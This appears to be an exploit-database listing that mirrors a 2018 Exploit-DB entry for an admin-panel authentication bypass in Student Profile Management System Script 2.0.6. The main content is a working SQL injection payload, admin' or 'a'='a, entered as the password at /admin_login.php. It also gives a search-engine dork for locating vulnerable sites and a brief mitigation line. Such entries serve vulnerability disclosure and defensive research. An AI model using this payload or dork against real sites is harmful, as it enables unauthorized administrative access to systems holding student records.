header-logo
Suggest Exploit
vendor:
Student Profile Management System
by:
Borna nematzadeh (L0RD)
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Student Profile Management System
Affected Version From: 2.0.6
Affected Version To: 2.0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:student_profile_management_system:2.0.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Student Profile Management System Script 2.0.6 – Admin Panel Authentication Bypass

With this exploit, an attacker can bypass the admin panel authentication by entering any username and the password 'admin' or 'a'='a' in the admin panel login page at /admin_login.php.

Mitigation:

Ensure that authentication credentials are properly validated and that access to the admin panel is restricted to authorized personnel only.
Source

Exploit-DB raw data:

# Exploit title: Student Profile Management System Script 2.0.6 - Admin
Panel Authentication Bypass
# Dork: "Powered by: i-Net Solution"
# Date: 2018-02-06
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/
# Version: 2.0.6
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,Attacker can bypass admin panel Authentication.
# # # # #
# Proof of Concept:

# username : anything
# password : admin' or 'a'='a
# admin panel login : /admin_login.php

Navigation

Suggest Exploit

Services By CQR